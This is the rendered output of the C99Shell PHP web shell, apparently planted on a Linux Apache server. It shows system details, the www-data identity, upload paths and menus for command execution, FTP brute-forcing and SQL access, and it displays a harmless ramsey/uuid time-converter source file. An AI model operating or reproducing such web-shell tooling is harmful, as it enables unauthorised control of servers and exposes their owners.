!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/uploads/script/vendor/ramsey/uuid/src/Converter/Time/   drwxr-xr-x
Free 13.12 GB of 57.97 GB (22.63%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     GenericTimeConverter.php (3.72 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * This file is part of the ramsey/uuid library
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 *
 * @copyright Copyright (c) Ben Ramsey <ben@benramsey.com>
 * @license http://opensource.org/licenses/MIT MIT
 */

declare(strict_types=1);

namespace 
Ramsey\Uuid\Converter\Time;

use 
Ramsey\Uuid\Converter\TimeConverterInterface;
use 
Ramsey\Uuid\Math\CalculatorInterface;
use 
Ramsey\Uuid\Math\RoundingMode;
use 
Ramsey\Uuid\Type\Hexadecimal;
use 
Ramsey\Uuid\Type\Integer as IntegerObject;
use 
Ramsey\Uuid\Type\Time;

use function 
explode;
use function 
str_pad;

use const 
STR_PAD_LEFT;

/**
 * GenericTimeConverter uses the provided calculator to calculate and convert
 * time values
 *
 * @psalm-immutable
 */
class GenericTimeConverter implements TimeConverterInterface
{
    
/**
     * The number of 100-nanosecond intervals from the Gregorian calendar epoch
     * to the Unix epoch.
     */
    
private const GREGORIAN_TO_UNIX_INTERVALS '122192928000000000';

    
/**
     * The number of 100-nanosecond intervals in one second.
     */
    
private const SECOND_INTERVALS '10000000';

    
/**
     * The number of 100-nanosecond intervals in one microsecond.
     */
    
private const MICROSECOND_INTERVALS '10';

    
/**
     * @var CalculatorInterface
     */
    
private $calculator;

    public function 
__construct(CalculatorInterface $calculator)
    {
        
$this->calculator $calculator;
    }

    public function 
calculateTime(string $secondsstring $microseconds): Hexadecimal
    
{
        
$timestamp = new Time($seconds$microseconds);

        
// Convert the seconds into a count of 100-nanosecond intervals.
        
$sec $this->calculator->multiply(
            
$timestamp->getSeconds(),
            new 
IntegerObject(self::SECOND_INTERVALS)
        );

        
// Convert the microseconds into a count of 100-nanosecond intervals.
        
$usec $this->calculator->multiply(
            
$timestamp->getMicroseconds(),
            new 
IntegerObject(self::MICROSECOND_INTERVALS)
        );

        
// Combine the seconds and microseconds intervals and add the count of
        // 100-nanosecond intervals from the Gregorian calendar epoch to the
        // Unix epoch. This gives us the correct count of 100-nanosecond
        // intervals since the Gregorian calendar epoch for the given seconds
        // and microseconds.
        /** @var IntegerObject $uuidTime */
        
$uuidTime $this->calculator->add(
            
$sec,
            
$usec,
            new 
IntegerObject(self::GREGORIAN_TO_UNIX_INTERVALS)
        );

        
$uuidTimeHex str_pad(
            
$this->calculator->toHexadecimal($uuidTime)->toString(),
            
16,
            
'0',
            
STR_PAD_LEFT
        
);

        return new 
Hexadecimal($uuidTimeHex);
    }

    public function 
convertTime(Hexadecimal $uuidTimestamp): Time
    
{
        
// From the total, subtract the number of 100-nanosecond intervals from
        // the Gregorian calendar epoch to the Unix epoch. This gives us the
        // number of 100-nanosecond intervals from the Unix epoch, which also
        // includes the microtime.
        
$epochNanoseconds $this->calculator->subtract(
            
$this->calculator->toInteger($uuidTimestamp),
            new 
IntegerObject(self::GREGORIAN_TO_UNIX_INTERVALS)
        );

        
// Convert the 100-nanosecond intervals into seconds and microseconds.
        
$unixTimestamp $this->calculator->divide(
            
RoundingMode::HALF_UP,
            
6,
            
$epochNanoseconds,
            new 
IntegerObject(self::SECOND_INTERVALS)
        );

        
$split explode('.', (string) $unixTimestamp2);

        return new 
Time($split[0], $split[1] ?? 0);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0061 ]--